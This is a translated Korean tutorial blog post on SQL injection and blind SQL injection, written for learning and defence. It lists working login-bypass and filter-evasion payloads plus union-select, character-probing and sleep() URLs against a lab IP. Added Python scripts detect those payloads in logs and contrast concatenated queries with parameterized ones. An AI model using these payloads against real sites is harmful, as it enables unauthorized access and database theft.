ÃֽŠ°Ô½Ã±Û(WEB)
2018.11.06 / 10:10

[WEB Vulnerability: SQL Injection] Filter bypass + Blind SQL Injection

hanulbit
Likes: 196

SQL INJECTION

[Definition]

SQL injection (also called SQL insertion) is a code injection technique in which the client's input values are manipulated to attack the server's database. It mainly occurs when user-supplied data is not properly filtered or escaped. Because the attack is easy to carry out yet enormously destructive, it is the first thing a developer learning secure coding studies. Injection-class vulnerabilities like this are hard to find through black-box testing, but they are usually found easily by scanning tools or a code review process, so they are comparatively easy to detect.

reference: 나무위키 (Namuwiki)


[Types]

  • SQL injection
  • blind SQL injection
  • union injection    ; used together with blind SQL injection

[Examples]

# Basic SQL injection

- Use the way the query is evaluated to make its condition true.

Normal SQL query: SELECT * from tables where id="$POST[id]" and password="$POST[password]";

Manipulated SQL query: SELECT * from tables where id="admin" and password="" or "1=1";

(In MySQL the string "1=1" is converted to the number 1 in a boolean context, so the or branch is always true and the password check is bypassed.)

 ID: admin
 PW: " or "1=1


[Filter bypass examples]

# When spaces are filtered

- Substitute %0a, /**/, %09 or () for the space (in a URL a space is %20)

Normal SQL query: SELECT * from tables where id="$POST[id]" and password="$POST[password]";

Manipulated SQL query: SELECT * from tables where id="admin" and password=""%0aor%0a"1=1";

 ID: admin
 PW: "%0aor%0a"1=1


# When =, and, or are filtered

- Replace them with like, && and || respectively

Normal SQL query: SELECT * from tables where id="$POST[id]" and password="$POST[password]";

Manipulated SQL query: SELECT * from tables where id="admin" and password="" ||  "1 like 1";

 ID: admin
 PW: " || "1 like 1





BLIND SQL INJECTION

[Definition]

A "blind" SQL injection is one where nothing is shown. When error-based SQL injection has been blocked, all DB information is hidden, so the only thing a submitted query can reveal from the server is true or false. Blind SQL injection is the attack technique that uses this true/false result to find out information inside the DB.


[Examples]

When you want to know the number of columns

sql query: select * from news where no=1 order by 1;

 URL: http://100.100.100.129/view.php?no=1 union select * from news where no=1 order by 1


When you want to know a table name

- Using ASCII codes, determine it one character at a time from the true/false result.

sql query: select ascii( substr( (select table_name from tables limit 0,1), 1, 1 ) )=67;

 URL: http://100.100.100.129/view.php?no=1 union select ascii( substr( (select table_name from tables limit 0,1), 1, 1 ) )=67;


When the true/false result cannot be observed

- Use and together with the sleep function: if the function runs (the response is delayed), the query is considered to have executed.

sql query: select * from news where no=1 order by 1;

 URL: http://100.100.100.129/view.php?no=1 union select * from news where no=1 order by 1 and sleep(10)
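From the defender's side, the filter-bypass section and the blind-injection examples above describe the same problem: a blocklist that looks for a literal space or the word "or" is defeated by %0a, %09, /**/ and ||, and the blind probes (union select, order by N, ascii(substr(...)), sleep()) leave a recognisable trace in the web server's access log. The following Python script is an added example, not code from the original post: it normalizes each request the way the bypasses require (double URL-decode, comments to spaces, whitespace collapsed) and then runs the detection rules over constructed access-log lines that reuse the payload shapes shown on this page. The log lines, IPs and rule names are all invented for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the original post). The query strings
# reuse the payload shapes from the post: %20/%0a//**/ whitespace substitutes,
# union select, ascii(substr(...)) character probing, sleep() and "1 like 1".
SAMPLE_LOG = [
    '100.100.100.10 - - [06/Nov/2018:10:10:01 +0900] "GET /view.php?no=1 HTTP/1.1" 200 512',
    '100.100.100.11 - - [06/Nov/2018:10:10:02 +0900] "GET /view.php?no=1%20union%20select%20*%20from%20news%20where%20no=1%20order%20by%201 HTTP/1.1" 200 512',
    '100.100.100.12 - - [06/Nov/2018:10:10:03 +0900] "GET /view.php?no=1%0aunion%0aselect%0aascii(substr((select%0atable_name%0afrom%0atables%0alimit%0a0,1),1,1))=67 HTTP/1.1" 200 512',
    '100.100.100.13 - - [06/Nov/2018:10:10:04 +0900] "GET /view.php?no=1/**/union/**/select/**/*/**/from/**/news/**/where/**/no=1/**/order/**/by/**/1/**/and/**/sleep(10) HTTP/1.1" 200 512',
    '100.100.100.14 - - [06/Nov/2018:10:10:05 +0900] "GET /login.php?id=admin&pw=%22%20||%20%221%20like%201 HTTP/1.1" 200 512',
    '100.100.100.15 - - [06/Nov/2018:10:10:06 +0900] "GET /search.php?q=order+form HTTP/1.1" 200 512',
]

# Rules are matched against the *normalized* request, so the filter-bypass
# spellings (%0a, %09, /**/, ||, like) collapse onto the same rule.
RULES = {
    "union_select": re.compile(r"\bunion\s+select\b"),
    "column_probe": re.compile(r"\border\s+by\s+\d+"),
    "char_probe":   re.compile(r"\bascii\s*\(\s*substr"),
    "time_delay":   re.compile(r"\bsleep\s*\("),
    "tautology":    re.compile(r"(?:\bor\b|\|\|)\s*[\"']?\s*1\s*(?:=|like)\s*[\"']?\s*1"),
}

REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def normalize(raw):
    """Undo the substitutions from the filter-bypass section: URL-decode twice
    (double encoding), turn /**/ comments into spaces, collapse all whitespace
    (%09 tab, %0a newline, %20 space) and lowercase."""
    s = unquote_plus(unquote_plus(raw))
    s = re.sub(r"/\*.*?\*/", " ", s)
    s = re.sub(r"\s+", " ", s)
    return s.lower()


def scan_request(path):
    """Return the names of all rules that fire on one request path."""
    text = normalize(path)
    return [name for name, rx in RULES.items() if rx.search(text)]


def scan_log(lines):
    """Return one finding per flagged log line: client IP, raw path, rules."""
    findings = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        hits = scan_request(m.group(1))
        if hits:
            findings.append({"ip": line.split(" ", 1)[0],
                             "path": m.group(1), "rules": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], ",".join(f["rules"]), f["path"])
```

The normalization step is the important part: matching the raw request for a space or the word "or" would miss three of the four injected lines, exactly as the filter-bypass section predicts, while the benign "order form" search is not flagged because the column_probe rule requires "order by" followed by a number. Treat these hits as triage signals for a WAF or SIEM, not as a substitute for parameterized queries.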


SQL INJECTION defences

  • Filter every character and keyword that can be used in an SQL query.
  • Take special care that error messages, especially query text, are never exposed.
  • Run the DB under a least-privilege user.
  • Allow access only from trusted networks and servers.
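The following Python script is an added example, not code from the original post. It puts the basic-injection and "spaces filtered" examples from above next to the first defence bullet: a login built by string concatenation (the shape of the post's id="$POST[id]" query), the same login behind a naive space-blocking filter, and a parameterized query. It uses an in-memory SQLite database with a constructed users table, and writes the payloads in SQLite's single-quote string syntax where the post's MySQL examples use double quotes; the user names and passwords are invented.

```python
import sqlite3

# Constructed sample users (not from the original post). Passwords are stored
# in plaintext only to keep the demonstration short.
USERS = [("admin", "s3cret-admin"), ("guest", "guest")]

# Payloads in SQLite's single-quote string syntax; the post's MySQL examples use
# double quotes, but the structure is identical. The second one is the
# "spaces filtered" variant with %0a already decoded to a newline.
PAYLOAD = "' or '1'='1"
PAYLOAD_NO_SPACES = "'\nor\n'1'='1"


def make_db():
    """In-memory SQLite database with a users table shaped like the post's query."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    conn.commit()
    return conn


def login_vulnerable(conn, user_id, password):
    """Builds the query by string concatenation, the pattern the post's
    id="$POST[id]" query shows. Returns the matched id or None."""
    query = ("SELECT id FROM users WHERE id='%s' AND password='%s'"
             % (user_id, password))
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def naive_space_filter(value):
    """Blocklist filter of the kind the post shows being bypassed: it rejects
    a literal space and nothing else."""
    if " " in value:
        raise ValueError("space not allowed")
    return value


def login_filtered(conn, user_id, password):
    """Concatenation behind the naive blocklist filter."""
    try:
        return login_vulnerable(conn, naive_space_filter(user_id),
                                naive_space_filter(password))
    except ValueError:
        return "rejected"


def login_safe(conn, user_id, password):
    """Parameterized query: the driver sends values separately from the SQL
    text, so quotes, newlines and keywords in the input never become SQL."""
    row = conn.execute("SELECT id FROM users WHERE id=? AND password=?",
                       (user_id, password)).fetchone()
    return row[0] if row else None


def demo():
    """Run every variant against the same database and collect the outcomes."""
    conn = make_db()
    return {
        "concat_payload": login_vulnerable(conn, "admin", PAYLOAD),
        "filtered_payload": login_filtered(conn, "admin", PAYLOAD),
        "filtered_newline_payload": login_filtered(conn, "admin", PAYLOAD_NO_SPACES),
        "safe_payload": login_safe(conn, "admin", PAYLOAD),
        "safe_newline_payload": login_safe(conn, "admin", PAYLOAD_NO_SPACES),
        "safe_real_password": login_safe(conn, "admin", "s3cret-admin"),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:26} -> {outcome}")
```

The concatenated query returns "admin" for both payloads, the space filter only stops the first one, and the parameterized query rejects both while still accepting the real password. That is why the first defence bullet (filtering SQL characters and keywords) is at best a second layer: the reliable fix is to keep user input out of the SQL text altogether, with least privilege and hidden error messages limiting the damage if something slips through.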

※ Applying or abusing this on ordinary sites, other than the sites that provide a practice environment, is absolutely prohibited!

※ We take no responsibility whatsoever for damage caused by reckless application or abuse.